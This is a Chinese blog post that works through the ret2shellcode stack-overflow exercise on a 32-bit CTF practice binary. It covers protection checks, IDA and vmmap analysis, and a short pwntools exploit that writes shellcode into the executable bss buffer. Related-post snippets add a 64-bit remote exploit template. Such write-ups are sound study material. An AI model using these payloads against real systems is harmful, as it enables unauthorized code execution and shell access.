pwn栈溢出学习 基本ROP——ret2shellcode

最新推荐文章于 2024-11-01 19:59:07 发布
原创 最新推荐文章于 2024-11-01 19:59:07 发布 · 1.1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #安全

本文探讨了一个32位程序,该程序没有开启任何保护机制,并存在栈溢出漏洞。通过IDApro分析,发现程序允许通过gets函数填充buf2,并在bss段执行。通过vmmap确认bss段可执行,因此可以构造payload,将shellcode写入内存并在buf2处执行。提供的exploit脚本展示了如何注入shellcode并控制程序流程。最终成功执行了shellcode。

ret2shellcode

目录

1.checksec看一下

在这里插入图片描述

  • 32位的文件
  • 什么保护都没开,并且有可读,可写,可执行段

2.IDA pro看一下

在这里插入图片描述

  • gets函数读入一个 s
  • 然后把 s 复制到 buf2
  • 可以看出,程序仍然是基本的栈溢出漏洞,不过这次还同时将对应的字符串复制到 buf2 处。简单查看可知 buf2 在 bss 段。
  • 那么这次我们就控制程序执行 shellcode,也就是读入 shellcode,然后控制程序执行 bss 段处的 shellcode。

3.vmmap看一下buf2的执行权限

在这里插入图片描述
bss段可执行,那么构造思路就是利用gets是函数将s填满,将shellcode写在s的最前面,再加上返回地址

4.exp附上

#!/usr/bin/env python
from pwn import *

sh = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804a080

sh.sendline(shellcode.ljust(112, 'A') + p32(buf2_addr))
sh.interactive()

5.运行结果

在这里插入图片描述

pwn-栈溢出】— ret2shellcode
weixin_43988488的博客
03-19 522
【代码】【pwn-栈溢出】— ret2shellcode
PWN --- ret2shellcode
qq_41696518的博客
06-28 1085
PWN ret2shellcode
字符串溢出(pwn溢出)--ret2shellcode
莫慌的博客
09-26 2355
pwn 入门
pwn ret2shellcode
小龙在线
09-12 606
ret2shellcode适用前提 不存在system等危险函数,注入shellcode 查看文件格式 查看CPU架构和安全机制 查看溢出漏洞位置 IDA打开ret2shellcode,搜索危险函数,不存在: main函数里,F5反编译,找到溢出点:gets 同时也能计算出EBP的偏移:0x1c + 0x64 = 查看EBP偏移: gdb ret2shellcode cyclic 200 r # 200个字符 cyclic -l caab 32位程序的EBP宽度是4个字节。 所以到EIP的偏移是
PWN栈溢出基础——ROP1.0
Gifoyle的博客
07-13 1053
PWN栈溢出基础——ROP1.0 这篇文章介绍ret2text,ret2shellcode,ret2syscall(基础篇) 在中间会尽量准确地阐述漏洞利用和exp的原理,并且尽量细致地将每一步操作写出来。 参考ctf-wiki以及其他资源,参考链接见最后,文中展示的题目下载链接见评论区 1.ret2text ret2text即控制程序执行程序本身已有的代码(.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几不相邻的程序已有的代码(也就是gadgets
PWN · ret2shellcode | “jmp esp“】[i春秋]ret2shellcode
Mr_Fmnwon的博客
10-04 1537
回顾ret2shellcode发现还有很多基础的技巧没有掌握。本题算是一个经典地、通过jmp esp将栈上的shellcode进行执行的题目。一、题目重述通过本例,掌握一个基础而常见的技巧:控制执行流到栈上指定位置开始执行。核心是利用了jmp esp 指令。
栈溢出/ret2shellcode/ret2syscall/ret2libc
m0_63220798的博客
08-20 725
(仅作为本人的学习笔记和心得 如有错误请多指教)
[PWN][进阶篇]ROP-Ret2Shellcode-64位实例
网络安全知识分享
03-24 4488
ROP-Ret2Shellcode-64位实例 /usr/include/x86_64-linux-gnu/asm/unisted_64.h 编写64位shellcode,思路和32位是一样的 (1)想办法调用execve("/bin/sh",null,null) (2)借助栈来传入字符串/bin/sh (3)系统调用execve rax = 0x3b(64bit) rdi = bin_sh_addr rsi = 0 rdx = 0 实例代码如下: setvbuf函数的作用是优化io流,在服务器上时,或
Rop-Ret2Shellcode-64位实例
fanghuapyk的博客
03-19 1036
Rop-Ret2Shellcode-64位实例 前面写过了32位的shellcode,这次继续64位shellcode,当我们的64位程序中没有system函数,并且开启了NX保护时,这时我们需要用到64位的shellcode来执行execve(“/bin/sh”,null,null); 如何编写shellcode呢? ①想办法调用execve("/binsh" , null, null); ②借助栈来传入字符串/bin/sh ③系统调用execve rax = 0x3b(64bit) rdi = bin_
PWN ret2shellcode
prettyX的博客
11-22 2112
今天天气阴,来做一下ret2shellcode。 记录一下。 : ) 0X00 ret2shellcode原理 ret2shellcode,就是,return to shellcode,即让程序中某个函数执行结束后,返回到shellcode的地址去执行shellcodeshellcode指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的shell。 ret2shellcode...
Ret2ShellCode
钞sir的博客
01-24 8744
红颜祸 千般柔情 相思难解两相若 蝶恋花 几经浮沉 枯骨终是化飞沙 简介 ret2shellcode顾名思义,就是return to shellcode,即让程序中某个函数执行结束后,返回到shellcode的地址去执行shellcode,得到system(sh)的效果;ret2shellcode栈溢出中一种简单而且常规的操作,当配合ROP等技术的使用后,非常有用 利用条件 ret2shel...
ret2shellcode
m0_62280492的博客
07-07 1349
简单介绍常见的ret2shellcode
[ret2shellcode]
GUANGUANMAO1的博客
11-01 410
ret2shellcode,即控制程序执行shellcode代码。shellcode指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的shell。一般来说,shellcode需要我们自已填充。这其实是另外一种典型的利用方法,即此时我们需要自己去填充一些可执行的。
pwn栈溢出 64位
最新发布
02-19
### 关于64位系统PWN栈溢出漏洞利用 #### 函数调用约定差异 在32位和64位Linux环境中,函数参数传递方式存在显著不同。对于64位系统而言,前六个整数或指针类型的参数通过寄存器(`rdi`, `rsi`, `rdx`, `rcx`, `r8`, `r9`)而非栈来传递[^1]。 #### 地址空间布局随机化(ASLR) 现代操作系统引入了地址空间布局随机化技术,使得每次启动进程时内存中的各个部分位置都会发生变化。这增加了预测返回地址难度,在一定程度上缓解了传统栈溢出攻击方法的有效性[^2]。 #### 返回导向编程(Return-Oriented Programming, ROP) 面对启用NX bit保护机制以及开启ASLR的情况下,ROP成为一种有效的绕过策略。该技巧涉及寻找并链接一系列存在于合法二进制文件内的短小指令序列(gadgets),最终构建起能够执行恶意操作的代码片[^3]。 #### 利用流程实例解析 假设目标应用程序存在未受限制的strcpy()调用,则可能允许攻击者覆盖存储于栈帧底部附近的返回地址。此时如果已知libc库加载基址或其他有用信息的话,就可以尝试构造payload以跳转至system("/bin/sh")这样的敏感API入口处[^4]。 ```python from pwn import * # 建立远程连接对象 conn = remote('target_ip', port) # 构造Payload offset = 0xdeadbeef # 替换成实际偏移量 ret_addr = pack('<Q', target_function_address) nop_sled = asm('nop') * (offset - len(ret_addr)) shellcode = asm(shellcraft.sh()) payload = nop_sled + ret_addr + shellcode # 发送Payload给服务端 conn.sendline(payload) # 进入交互模式等待命令执行结果 conn.interactive() ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值